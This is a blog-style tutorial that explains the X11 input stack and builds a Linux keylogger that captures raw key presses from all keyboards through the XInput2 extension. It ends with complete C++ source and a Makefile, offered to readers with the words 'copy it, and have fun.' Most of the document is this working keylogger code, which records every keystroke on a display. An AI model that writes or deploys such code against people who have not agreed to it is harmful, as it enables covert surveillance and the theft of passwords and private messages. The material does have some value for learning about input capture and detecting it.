..

Keylogging In Linux (x11 Version)

In previous post, we covered how a keylogger can be written for Linux, by reading events directly from keyboard device. Today, we will cover slightly different technique for keyboard event capture.

Linux GUI Stack

Unlike other OSes like Windows, GUI is not part of Linux OS itself. Instead, this is managed by a stack of different application, libraries and protocols. A generic stack looks something similar to this:

Here, X server sits between GUI and OS; and is responsible for providing various primitives. It implements the “windows, icons, menus, pointer” paradigm, which is bread and butter of GUI system. The protocol understood by X server is network oriented (which means, you can draw screen on completely different system than on which application is running); and is extensible by design. The GUI toolkits like GTK, GTK+, Qt etc use various X server libraries (these wrap the protocol behind “user friendly” functions) to draw various controls provided by them. Applications then use these libraries to design their own UIs. Generally these applications will be running on some Desktop Environment (a desktop environment implement “traditional” desktop elements (launcher, wallpaper etc) and controls (e.g. drag and drop)).

X Server Terminology

Since X server uses non-intuitive terminology, let us go through some of them before proceeding further:

display: A “display” is just a X server somewhere.

screen: A “screen” is a virtual framebuffer associated with a “display”. A display may have more than one screens.

monitor: This is your physical monitor where the framebuffer will be drawn. Generally, a screen will be mapped with one monitor; but that is not universally true. It is possible to have 2 monitors with same screen like in mirrored display; or to use two smaller monitors with one huge screen (where different parts of screen land on different monitors).

root window: This is window in which everything else will be drawn. This is root node of window tree.

virtual core device: X server will always have two virtual core devices: a mouse and a keyboard. These devices are not dependent upon presence of physical input device; and do not generate any independent events. These are also called master devices. These are designed to provide core events in a range that matches the Display resolution. At the same time, they also generate events that are in the device-specific resolution (if applicable). Clients that register for XInput Extension events, will receive events in this native resolution. Clients that open physical devices (“slave devices”) directly and register for events do not receive core events. A slave device cannot generate core events.

Keylogging in X Server

The basic way of input capture can be summarised as below:

Enumerating displays

By convention, when X server is running, it will create socket files in /tmp/.X11-unix/ for each display. The file names follow a common pattern of X<digits>, where :<digits> will be display name. We can enumerate this path, and try to open available displays to ensure that the socket files are indeed from X server.

The sample code for enumeration is as below:

std::vector<std::string> EnumerateDisplay()
{
    std::vector<std::string> displays;
    
    for (auto &p : std::filesystem::directory_iterator("/tmp/.X11-unix"))
    {
        std::string path = p.path().filename().string();
        std::string display_name = ":";
        
        if (path[0] != 'X') continue;
        
        path.erase(0, 1);
        display_name.append(path);
        
        Display *disp = XOpenDisplay(display_name.c_str());
        if (disp != NULL) 
        {
            int count = XScreenCount(disp);
            printf("Display %s has %d screens\n",
                display_name.c_str(), count);

            int i;
            for (i=0; i<count; i++)
                printf(" %d: %dx%d\n",
                    i, XDisplayWidth(disp, i), XDisplayHeight(disp, i));

            XCloseDisplay(disp);
            
            displays.push_back(display_name);
        }
    }
    
    return displays;
}

As you can see, we are enumerating screens and their dimensions for each detected display. If you run this, you will see output similar to:

Display :0 has 1 screens
 0: 1920x1080

Here, I have only one screen associated with display, which has dimension of 1920x1080.

Detecting XInputExtension

We can use XQueryExtension to check if any given extension is available on selected display. Since extensions may change their behaviour in future, it is good idea to limit to specific versions, where we havve tested our code. In this example, we will stick to version 2.0 of XInputExtension.

The code snippet for the above is as below:

// Set up X
Display * disp = XOpenDisplay(hostname);
if (NULL == disp)
{
    std::cerr << "Cannot open X display: " << hostname << std::endl;
    exit(1);
}

// Test for XInput 2 extension
int xiOpcode, queryEvent, queryError;
if (! XQueryExtension(disp, "XInputExtension", &xiOpcode, &queryEvent, &queryError)) 
{
    std::cerr << "X Input extension not available" << std::endl;
    exit(2);
}
// Request XInput 2.0, guarding against changes in future versions
int major = 2, minor = 0;
int queryResult = XIQueryVersion(disp, &major, &minor);
if (queryResult == BadRequest) 
{
    std::cerr << "Need XI 2.0 support (got " << major << "." << minor << std::endl;
    exit(3);
}
else if (queryResult != Success) 
{
    std::cerr << "Internal error" << std::endl;
    exit(4);
}

Registering for events

To get specific events from X server, we have to tell it which events we are interested in, by setting mask. The mask is defined as below:

typedef struct {
    int deviceid;
    int mask_len;
    unsigned char* mask;
} XIEventMask;

If deviceid is a valid device, the event mask is selected only for this device. If deviceid is XIAllDevices or XIAllMasterDevices, the event mask is selected for all devices or all master devices, respectively. The effective event mask is the bit-wise OR of the XIAllDevices, XIAllMasterDevices and the respective device’s event mask.

The mask_len specifies the length of mask in bytes.

Mask is a binary mask in the form of (1 « event type).

The mask can be set as below:

Window root = DefaultRootWindow(disp);

XIEventMask m;
m.deviceid = XIAllMasterDevices;
m.mask_len = XIMaskLen(XI_LASTEVENT);
m.mask = (unsigned char*)calloc(m.mask_len, sizeof(char));
XISetMask(m.mask, XI_RawKeyPress);
XISetMask(m.mask, XI_RawKeyRelease);

XISelectEvents(disp, root, &m, 1);
XSync(disp, false);
free(m.mask);

Reading Events

The event data comes in object of XGenericEventCookie, which is defined as below:

typedef struct {
    int type;
    unsigned long serial;
    Bool send_event;
    Display *display;
    int extension;
    int evtype;
    unsigned int cookie;
    void *data;
} XGenericEventCookie; 

For keyboard events, type will be GenericEvent, extension will be xiOpcode, evtype will be XI_RawKeyRelease or XI_RawKeyPress, and data will point to object of XIRawEvent.

To read the events, we need to do the following in a loop:

The code for the loop is as below:

while (true) 
{
    XEvent event;
    XGenericEventCookie *cookie = (XGenericEventCookie*)&event.xcookie;
    XNextEvent(disp, &event);

    if (XGetEventData(disp, cookie) &&
            cookie->type == GenericEvent &&
            cookie->extension == xiOpcode) 
    {
        switch (cookie->evtype)
        {
            case XI_RawKeyRelease:
            case XI_RawKeyPress: 
            {
                XIRawEvent *ev = (XIRawEvent*)cookie->data;

                // Ask X what it calls that key
                KeySym s = XkbKeycodeToKeysym(disp, ev->detail, 0, 0);
                if (NoSymbol == s) continue;
                char *str = XKeysymToString(s);
                if (NULL == str) continue;

                std::cout << (cookie->evtype == XI_RawKeyPress ? "+" : "-") << str << " " << std::flush;
                break;
            }
        }
    }
}

If you compare this code with keylogger code in previous blog post, you will see that we don’t have to map scan codes to actual keys on keyboards manually. We let X server do the heavy lifting of dealing with applicable keyboard layouts, and correct mapping of scan code to keys on current layout (something we did not bother handling in previous post, because this is headache).

Complete Code

For sake of completeness, I am putting whole code here for you. Copy it, and have fun.

keylogger.cpp

#include <X11/XKBlib.h>
#include <X11/extensions/XInput2.h>

#include <cstring>

#include <dirent.h>
#include <filesystem>
#include <iostream>
#include <string>
#include <vector>

int printUsage(std::string application_name) 
{
    std::cout << "USAGE: " << application_name << " [-display <display>] [-enumerate] [-help]" << std::endl;
    std::cout << "display      target X display                   (default :0)" << std::endl;
    std::cout << "enumerate    enumerate all X11 displays" << std::endl;
    std::cout << "help         print this information and exit" << std::endl;

    exit(0);
}

std::vector<std::string> EnumerateDisplay()
{
    std::vector<std::string> displays;
    
    for (auto &p : std::filesystem::directory_iterator("/tmp/.X11-unix"))
    {
        std::string path = p.path().filename().string();
        std::string display_name = ":";
        
        if (path[0] != 'X') continue;
        
        path.erase(0, 1);
        display_name.append(path);
        
        Display *disp = XOpenDisplay(display_name.c_str());
        if (disp != NULL) 
        {
            int count = XScreenCount(disp);
            printf("Display %s has %d screens\n",
                display_name.c_str(), count);

            int i;
            for (i=0; i<count; i++)
                printf(" %d: %dx%d\n",
                    i, XDisplayWidth(disp, i), XDisplayHeight(disp, i));

            XCloseDisplay(disp);
            
            displays.push_back(display_name);
        }
    }
    
    return displays;
}

int main(int argc, char * argv[])
{
    const char * hostname    = ":0";

    // Get arguments
    for (int i = 1; i < argc; i++)
    {
        if      (!strcmp(argv[i], "-help"))
            printUsage(argv[0]);
        else if (!strcmp(argv[i], "-display"))  
            hostname    = argv[++i];
        else if (!strcmp(argv[i], "-enumerate"))
        {
            EnumerateDisplay();
            return 0;
        }
        else
        { 
            std::cerr << "Unknown argument: " << argv[i] << std::endl;
            printUsage(argv[0]); 
        }
    }

    // Set up X
    Display * disp = XOpenDisplay(hostname);
    if (NULL == disp)
    {
        std::cerr << "Cannot open X display: " << hostname << std::endl;
        exit(1);
    }

    // Test for XInput 2 extension
    int xiOpcode, queryEvent, queryError;
    if (! XQueryExtension(disp, "XInputExtension", &xiOpcode, &queryEvent, &queryError)) 
    {
        std::cerr << "X Input extension not available" << std::endl;
        exit(2);
    }
    { // Request XInput 2.0, guarding against changes in future versions
        int major = 2, minor = 0;
        int queryResult = XIQueryVersion(disp, &major, &minor);
        if (queryResult == BadRequest) 
        {
            std::cerr << "Need XI 2.0 support (got " << major << "." << minor << std::endl;
            exit(3);
        }
        else if (queryResult != Success) 
        {
            std::cerr << "Internal error" << std::endl;
            exit(4);
        }
    }

    // Register events
    Window root = DefaultRootWindow(disp);
    
    XIEventMask m;
    m.deviceid = XIAllMasterDevices;
    m.mask_len = XIMaskLen(XI_LASTEVENT);
    m.mask = (unsigned char*)calloc(m.mask_len, sizeof(char));
    XISetMask(m.mask, XI_RawKeyPress);
    XISetMask(m.mask, XI_RawKeyRelease);
    
    XISelectEvents(disp, root, &m, 1);
    XSync(disp, false);
    free(m.mask);

    while (true) 
    {
        XEvent event;
        XGenericEventCookie *cookie = (XGenericEventCookie*)&event.xcookie;
        XNextEvent(disp, &event);

        if (XGetEventData(disp, cookie) &&
                cookie->type == GenericEvent &&
                cookie->extension == xiOpcode) 
        {
            switch (cookie->evtype)
            {
                case XI_RawKeyRelease:
                case XI_RawKeyPress: 
                {
                    XIRawEvent *ev = (XIRawEvent*)cookie->data;

                    // Ask X what it calls that key
                    KeySym s = XkbKeycodeToKeysym(disp, ev->detail, 0, 0);
                    if (NoSymbol == s) continue;
                    char *str = XKeysymToString(s);
                    if (NULL == str) continue;

                    std::cout << (cookie->evtype == XI_RawKeyPress ? "+" : "-") << str << " " << std::flush;
                    break;
                }
            }
        }
    }
}

Makefile

keylogger: keylogger.cpp
	$(CXX) --std=c++17 -pedantic -Wall -lX11 -lXi -o keylogger keylogger.cpp -O0 -ggdb
clean:
	rm --force keylogger

Have fun.